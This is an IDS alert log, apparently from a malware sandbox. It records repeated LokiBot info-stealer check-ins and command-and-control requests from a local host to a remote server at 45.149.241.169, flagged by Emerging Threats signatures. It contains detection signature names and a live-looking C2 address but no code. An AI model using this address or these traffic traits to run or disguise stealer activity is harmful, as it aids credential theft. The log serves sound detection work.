2024-10-03T09:22:04.115545+0200 | 2025381 | ET MALWARE LokiBot Checkin | 1 | 192.168.2.11 | 64406 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:04.115545+0200 | 2825766 | ETPRO MALWARE LokiBot Checkin M2 | 1 | 192.168.2.11 | 64406 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:04.921954+0200 | 2024313 | ET MALWARE LokiBot Request for C2 Commands Detected M1 | 1 | 192.168.2.11 | 64406 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:04.921954+0200 | 2024318 | ET MALWARE LokiBot Request for C2 Commands Detected M2 | 1 | 192.168.2.11 | 64406 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:04.926899+0200 | 2025483 | ET MALWARE LokiBot Fake 404 Response | 1 | 45.149.241.169 | 80 | 192.168.2.11 | 64406 | TCP |
2024-10-03T09:22:05.338912+0200 | 2021641 | ET MALWARE LokiBot User-Agent (Charon/Inferno) | 1 | 192.168.2.11 | 64407 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:05.338912+0200 | 2025381 | ET MALWARE LokiBot Checkin | 1 | 192.168.2.11 | 64407 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:05.338912+0200 | 2825766 | ETPRO MALWARE LokiBot Checkin M2 | 1 | 192.168.2.11 | 64407 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:06.114484+0200 | 2024313 | ET MALWARE LokiBot Request for C2 Commands Detected M1 | 1 | 192.168.2.11 | 64407 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:06.114484+0200 | 2024318 | ET MALWARE LokiBot Request for C2 Commands Detected M2 | 1 | 192.168.2.11 | 64407 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:06.119391+0200 | 2025483 | ET MALWARE LokiBot Fake 404 Response | 1 | 45.149.241.169 | 80 | 192.168.2.11 | 64407 | TCP |
2024-10-03T09:22:06.283716+0200 | 2021641 | ET MALWARE LokiBot User-Agent (Charon/Inferno) | 1 | 192.168.2.11 | 64408 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:06.283716+0200 | 2025381 | ET MALWARE LokiBot Checkin | 1 | 192.168.2.11 | 64408 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:06.283716+0200 | 2825766 | ETPRO MALWARE LokiBot Checkin M2 | 1 | 192.168.2.11 | 64408 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:07.060441+0200 | 2024313 | ET MALWARE LokiBot Request for C2 Commands Detected M1 | 1 | 192.168.2.11 | 64408 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:07.060441+0200 | 2024318 | ET MALWARE LokiBot Request for C2 Commands Detected M2 | 1 | 192.168.2.11 | 64408 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:07.070496+0200 | 2025483 | ET MALWARE LokiBot Fake 404 Response | 1 | 45.149.241.169 | 80 | 192.168.2.11 | 64408 | TCP |
2024-10-03T09:22:07.225458+0200 | 2021641 | ET MALWARE LokiBot User-Agent (Charon/Inferno) | 1 | 192.168.2.11 | 64409 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:07.225458+0200 | 2025381 | ET MALWARE LokiBot Checkin | 1 | 192.168.2.11 | 64409 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:07.225458+0200 | 2825766 | ETPRO MALWARE LokiBot Checkin M2 | 1 | 192.168.2.11 | 64409 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:07.996431+0200 | 2024313 | ET MALWARE LokiBot Request for C2 Commands Detected M1 | 1 | 192.168.2.11 | 64409 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:07.996431+0200 | 2024318 | ET MALWARE LokiBot Request for C2 Commands Detected M2 | 1 | 192.168.2.11 | 64409 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:08.024007+0200 | 2025483 | ET MALWARE LokiBot Fake 404 Response | 1 | 45.149.241.169 | 80 | 192.168.2.11 | 64409 | TCP |
2024-10-03T09:22:08.313595+0200 | 2021641 | ET MALWARE LokiBot User-Agent (Charon/Inferno) | 1 | 192.168.2.11 | 64410 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:08.313595+0200 | 2025381 | ET MALWARE LokiBot Checkin | 1 | 192.168.2.11 | 64410 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:08.313595+0200 | 2825766 | ETPRO MALWARE LokiBot Checkin M2 | 1 | 192.168.2.11 | 64410 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:09.068231+0200 | 2024313 | ET MALWARE LokiBot Request for C2 Commands Detected M1 | 1 | 192.168.2.11 | 64410 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:09.068231+0200 | 2024318 | ET MALWARE LokiBot Request for C2 Commands Detected M2 | 1 | 192.168.2.11 | 64410 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:09.073052+0200 | 2025483 | ET MALWARE LokiBot Fake 404 Response | 1 | 45.149.241.169 | 80 | 192.168.2.11 | 64410 | TCP |
2024-10-03T09:22:09.230403+0200 | 2021641 | ET MALWARE LokiBot User-Agent (Charon/Inferno) | 1 | 192.168.2.11 | 64411 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:09.230403+0200 | 2025381 | ET MALWARE LokiBot Checkin | 1 | 192.168.2.11 | 64411 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:09.230403+0200 | 2825766 | ETPRO MALWARE LokiBot Checkin M2 | 1 | 192.168.2.11 | 64411 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:10.004080+0200 | 2024313 | ET MALWARE LokiBot Request for C2 Commands Detected M1 | 1 | 192.168.2.11 | 64411 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:10.004080+0200 | 2024318 | ET MALWARE LokiBot Request for C2 Commands Detected M2 | 1 | 192.168.2.11 | 64411 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:10.010284+0200 | 2025483 | ET MALWARE LokiBot Fake 404 Response | 1 | 45.149.241.169 | 80 | 192.168.2.11 | 64411 | TCP |
2024-10-03T09:22:10.331436+0200 | 2021641 | ET MALWARE LokiBot User-Agent (Charon/Inferno) | 1 | 192.168.2.11 | 64412 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:10.331436+0200 | 2025381 | ET MALWARE LokiBot Checkin | 1 | 192.168.2.11 | 64412 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:10.331436+0200 | 2825766 | ETPRO MALWARE LokiBot Checkin M2 | 1 | 192.168.2.11 | 64412 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:11.079290+0200 | 2024313 | ET MALWARE LokiBot Request for C2 Commands Detected M1 | 1 | 192.168.2.11 | 64412 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:11.079290+0200 | 2024318 | ET MALWARE LokiBot Request for C2 Commands Detected M2 | 1 | 192.168.2.11 | 64412 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:11.084543+0200 | 2025483 | ET MALWARE LokiBot Fake 404 Response | 1 | 45.149.241.169 | 80 | 192.168.2.11 | 64412 | TCP |
2024-10-03T09:22:11.239806+0200 | 2021641 | ET MALWARE LokiBot User-Agent (Charon/Inferno) | 1 | 192.168.2.11 | 64413 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:11.239806+0200 | 2025381 | ET MALWARE LokiBot Checkin | 1 | 192.168.2.11 | 64413 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:11.239806+0200 | 2825766 | ETPRO MALWARE LokiBot Checkin M2 | 1 | 192.168.2.11 | 64413 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:12.003792+0200 | 2024313 | ET MALWARE LokiBot Request for C2 Commands Detected M1 | 1 | 192.168.2.11 | 64413 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:12.003792+0200 | 2024318 | ET MALWARE LokiBot Request for C2 Commands Detected M2 | 1 | 192.168.2.11 | 64413 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:12.009694+0200 | 2025483 | ET MALWARE LokiBot Fake 404 Response | 1 | 45.149.241.169 | 80 | 192.168.2.11 | 64413 | TCP |
2024-10-03T09:22:12.172123+0200 | 2021641 | ET MALWARE LokiBot User-Agent (Charon/Inferno) | 1 | 192.168.2.11 | 64414 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:12.172123+0200 | 2025381 | ET MALWARE LokiBot Checkin | 1 | 192.168.2.11 | 64414 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:12.172123+0200 | 2825766 | ETPRO MALWARE LokiBot Checkin M2 | 1 | 192.168.2.11 | 64414 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:12.893575+0200 | 2024313 | ET MALWARE LokiBot Request for C2 Commands Detected M1 | 1 | 192.168.2.11 | 64414 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:12.893575+0200 | 2024318 | ET MALWARE LokiBot Request for C2 Commands Detected M2 | 1 | 192.168.2.11 | 64414 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:12.898558+0200 | 2025483 | ET MALWARE LokiBot Fake 404 Response | 1 | 45.149.241.169 | 80 | 192.168.2.11 | 64414 | TCP |
2024-10-03T09:22:13.068985+0200 | 2021641 | ET MALWARE LokiBot User-Agent (Charon/Inferno) | 1 | 192.168.2.11 | 64415 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:13.068985+0200 | 2025381 | ET MALWARE LokiBot Checkin | 1 | 192.168.2.11 | 64415 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:13.068985+0200 | 2825766 | ETPRO MALWARE LokiBot Checkin M2 | 1 | 192.168.2.11 | 64415 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:13.853371+0200 | 2024313 | ET MALWARE LokiBot Request for C2 Commands Detected M1 | 1 | 192.168.2.11 | 64415 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:13.853371+0200 | 2024318 | ET MALWARE LokiBot Request for C2 Commands Detected M2 | 1 | 192.168.2.11 | 64415 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:13.862095+0200 | 2025483 | ET MALWARE LokiBot Fake 404 Response | 1 | 45.149.241.169 | 80 | 192.168.2.11 | 64415 | TCP |
2024-10-03T09:22:14.008975+0200 | 2021641 | ET MALWARE LokiBot User-Agent (Charon/Inferno) | 1 | 192.168.2.11 | 64416 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:14.008975+0200 | 2025381 | ET MALWARE LokiBot Checkin | 1 | 192.168.2.11 | 64416 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:14.008975+0200 | 2825766 | ETPRO MALWARE LokiBot Checkin M2 | 1 | 192.168.2.11 | 64416 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:14.776328+0200 | 2024313 | ET MALWARE LokiBot Request for C2 Commands Detected M1 | 1 | 192.168.2.11 | 64416 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:14.776328+0200 | 2024318 | ET MALWARE LokiBot Request for C2 Commands Detected M2 | 1 | 192.168.2.11 | 64416 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:14.782651+0200 | 2025483 | ET MALWARE LokiBot Fake 404 Response | 1 | 45.149.241.169 | 80 | 192.168.2.11 | 64416 | TCP |
2024-10-03T09:22:14.936067+0200 | 2021641 | ET MALWARE LokiBot User-Agent (Charon/Inferno) | 1 | 192.168.2.11 | 64417 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:14.936067+0200 | 2025381 | ET MALWARE LokiBot Checkin | 1 | 192.168.2.11 | 64417 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:14.936067+0200 | 2825766 | ETPRO MALWARE LokiBot Checkin M2 | 1 | 192.168.2.11 | 64417 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:15.764134+0200 | 2024313 | ET MALWARE LokiBot Request for C2 Commands Detected M1 | 1 | 192.168.2.11 | 64417 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:15.764134+0200 | 2024318 | ET MALWARE LokiBot Request for C2 Commands Detected M2 | 1 | 192.168.2.11 | 64417 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:15.769373+0200 | 2025483 | ET MALWARE LokiBot Fake 404 Response | 1 | 45.149.241.169 | 80 | 192.168.2.11 | 64417 | TCP |
2024-10-03T09:22:15.929179+0200 | 2021641 | ET MALWARE LokiBot User-Agent (Charon/Inferno) | 1 | 192.168.2.11 | 64418 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:15.929179+0200 | 2025381 | ET MALWARE LokiBot Checkin | 1 | 192.168.2.11 | 64418 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:15.929179+0200 | 2825766 | ETPRO MALWARE LokiBot Checkin M2 | 1 | 192.168.2.11 | 64418 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:16.667875+0200 | 2024313 | ET MALWARE LokiBot Request for C2 Commands Detected M1 | 1 | 192.168.2.11 | 64418 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:16.667875+0200 | 2024318 | ET MALWARE LokiBot Request for C2 Commands Detected M2 | 1 | 192.168.2.11 | 64418 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:16.672757+0200 | 2025483 | ET MALWARE LokiBot Fake 404 Response | 1 | 45.149.241.169 | 80 | 192.168.2.11 | 64418 | TCP |
2024-10-03T09:22:16.827330+0200 | 2021641 | ET MALWARE LokiBot User-Agent (Charon/Inferno) | 1 | 192.168.2.11 | 64419 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:16.827330+0200 | 2025381 | ET MALWARE LokiBot Checkin | 1 | 192.168.2.11 | 64419 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:16.827330+0200 | 2825766 | ETPRO MALWARE LokiBot Checkin M2 | 1 | 192.168.2.11 | 64419 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:17.525911+0200 | 2024313 | ET MALWARE LokiBot Request for C2 Commands Detected M1 | 1 | 192.168.2.11 | 64419 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:17.525911+0200 | 2024318 | ET MALWARE LokiBot Request for C2 Commands Detected M2 | 1 | 192.168.2.11 | 64419 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:17.541317+0200 | 2025483 | ET MALWARE LokiBot Fake 404 Response | 1 | 45.149.241.169 | 80 | 192.168.2.11 | 64419 | TCP |
2024-10-03T09:22:17.703674+0200 | 2021641 | ET MALWARE LokiBot User-Agent (Charon/Inferno) | 1 | 192.168.2.11 | 64420 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:17.703674+0200 | 2025381 | ET MALWARE LokiBot Checkin | 1 | 192.168.2.11 | 64420 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:17.703674+0200 | 2825766 | ETPRO MALWARE LokiBot Checkin M2 | 1 | 192.168.2.11 | 64420 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:18.555021+0200 | 2024313 | ET MALWARE LokiBot Request for C2 Commands Detected M1 | 1 | 192.168.2.11 | 64420 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:18.555021+0200 | 2024318 | ET MALWARE LokiBot Request for C2 Commands Detected M2 | 1 | 192.168.2.11 | 64420 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:18.559915+0200 | 2025483 | ET MALWARE LokiBot Fake 404 Response | 1 | 45.149.241.169 | 80 | 192.168.2.11 | 64420 | TCP |
2024-10-03T09:22:18.714301+0200 | 2021641 | ET MALWARE LokiBot User-Agent (Charon/Inferno) | 1 | 192.168.2.11 | 64421 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:18.714301+0200 | 2025381 | ET MALWARE LokiBot Checkin | 1 | 192.168.2.11 | 64421 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:18.714301+0200 | 2825766 | ETPRO MALWARE LokiBot Checkin M2 | 1 | 192.168.2.11 | 64421 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:19.379297+0200 | 2024313 | ET MALWARE LokiBot Request for C2 Commands Detected M1 | 1 | 192.168.2.11 | 64421 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:19.379297+0200 | 2024318 | ET MALWARE LokiBot Request for C2 Commands Detected M2 | 1 | 192.168.2.11 | 64421 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:19.384819+0200 | 2025483 | ET MALWARE LokiBot Fake 404 Response | 1 | 45.149.241.169 | 80 | 192.168.2.11 | 64421 | TCP |
2024-10-03T09:22:19.547744+0200 | 2021641 | ET MALWARE LokiBot User-Agent (Charon/Inferno) | 1 | 192.168.2.11 | 64422 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:19.547744+0200 | 2025381 | ET MALWARE LokiBot Checkin | 1 | 192.168.2.11 | 64422 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:19.547744+0200 | 2825766 | ETPRO MALWARE LokiBot Checkin M2 | 1 | 192.168.2.11 | 64422 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:20.358626+0200 | 2024313 | ET MALWARE LokiBot Request for C2 Commands Detected M1 | 1 | 192.168.2.11 | 64422 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:20.358626+0200 | 2024318 | ET MALWARE LokiBot Request for C2 Commands Detected M2 | 1 | 192.168.2.11 | 64422 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:20.373252+0200 | 2025483 | ET MALWARE LokiBot Fake 404 Response | 1 | 45.149.241.169 | 80 | 192.168.2.11 | 64422 | TCP |
2024-10-03T09:22:20.566222+0200 | 2021641 | ET MALWARE LokiBot User-Agent (Charon/Inferno) | 1 | 192.168.2.11 | 64423 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:20.566222+0200 | 2025381 | ET MALWARE LokiBot Checkin | 1 | 192.168.2.11 | 64423 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:20.566222+0200 | 2825766 | ETPRO MALWARE LokiBot Checkin M2 | 1 | 192.168.2.11 | 64423 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:21.203422+0200 | 2024313 | ET MALWARE LokiBot Request for C2 Commands Detected M1 | 1 | 192.168.2.11 | 64423 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:21.203422+0200 | 2024318 | ET MALWARE LokiBot Request for C2 Commands Detected M2 | 1 | 192.168.2.11 | 64423 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:21.208335+0200 | 2025483 | ET MALWARE LokiBot Fake 404 Response | 1 | 45.149.241.169 | 80 | 192.168.2.11 | 64423 | TCP |
2024-10-03T09:22:21.356699+0200 | 2021641 | ET MALWARE LokiBot User-Agent (Charon/Inferno) | 1 | 192.168.2.11 | 64424 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:21.356699+0200 | 2025381 | ET MALWARE LokiBot Checkin | 1 | 192.168.2.11 | 64424 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:21.356699+0200 | 2825766 | ETPRO MALWARE LokiBot Checkin M2 | 1 | 192.168.2.11 | 64424 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:22.048862+0200 | 2024313 | ET MALWARE LokiBot Request for C2 Commands Detected M1 | 1 | 192.168.2.11 | 64424 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:22.048862+0200 | 2024318 | ET MALWARE LokiBot Request for C2 Commands Detected M2 | 1 | 192.168.2.11 | 64424 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:22.053825+0200 | 2025483 | ET MALWARE LokiBot Fake 404 Response | 1 | 45.149.241.169 | 80 | 192.168.2.11 | 64424 | TCP |
2024-10-03T09:22:22.220181+0200 | 2021641 | ET MALWARE LokiBot User-Agent (Charon/Inferno) | 1 | 192.168.2.11 | 64425 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:22.220181+0200 | 2025381 | ET MALWARE LokiBot Checkin | 1 | 192.168.2.11 | 64425 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:22.220181+0200 | 2825766 | ETPRO MALWARE LokiBot Checkin M2 | 1 | 192.168.2.11 | 64425 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:22.910892+0200 | 2024313 | ET MALWARE LokiBot Request for C2 Commands Detected M1 | 1 | 192.168.2.11 | 64425 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:22.910892+0200 | 2024318 | ET MALWARE LokiBot Request for C2 Commands Detected M2 | 1 | 192.168.2.11 | 64425 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:23.004091+0200 | 2025483 | ET MALWARE LokiBot Fake 404 Response | 1 | 45.149.241.169 | 80 | 192.168.2.11 | 64425 | TCP |
2024-10-03T09:22:23.369318+0200 | 2021641 | ET MALWARE LokiBot User-Agent (Charon/Inferno) | 1 | 192.168.2.11 | 64426 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:23.369318+0200 | 2025381 | ET MALWARE LokiBot Checkin | 1 | 192.168.2.11 | 64426 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:23.369318+0200 | 2825766 | ETPRO MALWARE LokiBot Checkin M2 | 1 | 192.168.2.11 | 64426 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:23.931318+0200 | 2024313 | ET MALWARE LokiBot Request for C2 Commands Detected M1 | 1 | 192.168.2.11 | 64426 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:23.931318+0200 | 2024318 | ET MALWARE LokiBot Request for C2 Commands Detected M2 | 1 | 192.168.2.11 | 64426 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:23.936122+0200 | 2025483 | ET MALWARE LokiBot Fake 404 Response | 1 | 45.149.241.169 | 80 | 192.168.2.11 | 64426 | TCP |
2024-10-03T09:22:24.106031+0200 | 2021641 | ET MALWARE LokiBot User-Agent (Charon/Inferno) | 1 | 192.168.2.11 | 64427 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:24.106031+0200 | 2025381 | ET MALWARE LokiBot Checkin | 1 | 192.168.2.11 | 64427 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:24.106031+0200 | 2825766 | ETPRO MALWARE LokiBot Checkin M2 | 1 | 192.168.2.11 | 64427 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:24.748653+0200 | 2024313 | ET MALWARE LokiBot Request for C2 Commands Detected M1 | 1 | 192.168.2.11 | 64427 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:24.748653+0200 | 2024318 | ET MALWARE LokiBot Request for C2 Commands Detected M2 | 1 | 192.168.2.11 | 64427 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:24.754606+0200 | 2025483 | ET MALWARE LokiBot Fake 404 Response | 1 | 45.149.241.169 | 80 | 192.168.2.11 | 64427 | TCP |
2024-10-03T09:22:24.910667+0200 | 2021641 | ET MALWARE LokiBot User-Agent (Charon/Inferno) | 1 | 192.168.2.11 | 64428 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:24.910667+0200 | 2025381 | ET MALWARE LokiBot Checkin | 1 | 192.168.2.11 | 64428 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:24.910667+0200 | 2825766 | ETPRO MALWARE LokiBot Checkin M2 | 1 | 192.168.2.11 | 64428 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:25.639024+0200 | 2024313 | ET MALWARE LokiBot Request for C2 Commands Detected M1 | 1 | 192.168.2.11 | 64428 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:25.639024+0200 | 2024318 | ET MALWARE LokiBot Request for C2 Commands Detected M2 | 1 | 192.168.2.11 | 64428 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:25.644791+0200 | 2025483 | ET MALWARE LokiBot Fake 404 Response | 1 | 45.149.241.169 | 80 | 192.168.2.11 | 64428 | TCP |
2024-10-03T09:22:25.816016+0200 | 2021641 | ET MALWARE LokiBot User-Agent (Charon/Inferno) | 1 | 192.168.2.11 | 64429 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:25.816016+0200 | 2025381 | ET MALWARE LokiBot Checkin | 1 | 192.168.2.11 | 64429 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:25.816016+0200 | 2825766 | ETPRO MALWARE LokiBot Checkin M2 | 1 | 192.168.2.11 | 64429 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:26.473248+0200 | 2024313 | ET MALWARE LokiBot Request for C2 Commands Detected M1 | 1 | 192.168.2.11 | 64429 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:26.473248+0200 | 2024318 | ET MALWARE LokiBot Request for C2 Commands Detected M2 | 1 | 192.168.2.11 | 64429 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:26.484271+0200 | 2025483 | ET MALWARE LokiBot Fake 404 Response | 1 | 45.149.241.169 | 80 | 192.168.2.11 | 64429 | TCP |
2024-10-03T09:22:26.659850+0200 | 2021641 | ET MALWARE LokiBot User-Agent (Charon/Inferno) | 1 | 192.168.2.11 | 64430 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:26.659850+0200 | 2025381 | ET MALWARE LokiBot Checkin | 1 | 192.168.2.11 | 64430 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:26.659850+0200 | 2825766 | ETPRO MALWARE LokiBot Checkin M2 | 1 | 192.168.2.11 | 64430 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:27.331889+0200 | 2024313 | ET MALWARE LokiBot Request for C2 Commands Detected M1 | 1 | 192.168.2.11 | 64430 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:27.331889+0200 | 2024318 | ET MALWARE LokiBot Request for C2 Commands Detected M2 | 1 | 192.168.2.11 | 64430 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:27.336837+0200 | 2025483 | ET MALWARE LokiBot Fake 404 Response | 1 | 45.149.241.169 | 80 | 192.168.2.11 | 64430 | TCP |
2024-10-03T09:22:27.504132+0200 | 2021641 | ET MALWARE LokiBot User-Agent (Charon/Inferno) | 1 | 192.168.2.11 | 64431 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:27.504132+0200 | 2025381 | ET MALWARE LokiBot Checkin | 1 | 192.168.2.11 | 64431 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:27.504132+0200 | 2825766 | ETPRO MALWARE LokiBot Checkin M2 | 1 | 192.168.2.11 | 64431 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:28.156424+0200 | 2024313 | ET MALWARE LokiBot Request for C2 Commands Detected M1 | 1 | 192.168.2.11 | 64431 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:28.156424+0200 | 2024318 | ET MALWARE LokiBot Request for C2 Commands Detected M2 | 1 | 192.168.2.11 | 64431 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:28.161528+0200 | 2025483 | ET MALWARE LokiBot Fake 404 Response | 1 | 45.149.241.169 | 80 | 192.168.2.11 | 64431 | TCP |
2024-10-03T09:22:28.311778+0200 | 2021641 | ET MALWARE LokiBot User-Agent (Charon/Inferno) | 1 | 192.168.2.11 | 64432 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:28.311778+0200 | 2025381 | ET MALWARE LokiBot Checkin | 1 | 192.168.2.11 | 64432 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:28.311778+0200 | 2825766 | ETPRO MALWARE LokiBot Checkin M2 | 1 | 192.168.2.11 | 64432 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:29.195837+0200 | 2024313 | ET MALWARE LokiBot Request for C2 Commands Detected M1 | 1 | 192.168.2.11 | 64432 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:29.195837+0200 | 2024318 | ET MALWARE LokiBot Request for C2 Commands Detected M2 | 1 | 192.168.2.11 | 64432 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:29.297417+0200 | 2025483 | ET MALWARE LokiBot Fake 404 Response | 1 | 45.149.241.169 | 80 | 192.168.2.11 | 64432 | TCP |
2024-10-03T09:22:29.639445+0200 | 2021641 | ET MALWARE LokiBot User-Agent (Charon/Inferno) | 1 | 192.168.2.11 | 64433 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:29.639445+0200 | 2025381 | ET MALWARE LokiBot Checkin | 1 | 192.168.2.11 | 64433 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:29.639445+0200 | 2825766 | ETPRO MALWARE LokiBot Checkin M2 | 1 | 192.168.2.11 | 64433 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:30.480234+0200 | 2024313 | ET MALWARE LokiBot Request for C2 Commands Detected M1 | 1 | 192.168.2.11 | 64433 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:30.480234+0200 | 2024318 | ET MALWARE LokiBot Request for C2 Commands Detected M2 | 1 | 192.168.2.11 | 64433 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:30.485332+0200 | 2025483 | ET MALWARE LokiBot Fake 404 Response | 1 | 45.149.241.169 | 80 | 192.168.2.11 | 64433 | TCP |
2024-10-03T09:22:30.646052+0200 | 2021641 | ET MALWARE LokiBot User-Agent (Charon/Inferno) | 1 | 192.168.2.11 | 64434 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:30.646052+0200 | 2025381 | ET MALWARE LokiBot Checkin | 1 | 192.168.2.11 | 64434 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:30.646052+0200 | 2825766 | ETPRO MALWARE LokiBot Checkin M2 | 1 | 192.168.2.11 | 64434 | 45.149.241.169 | 80 | TCP |
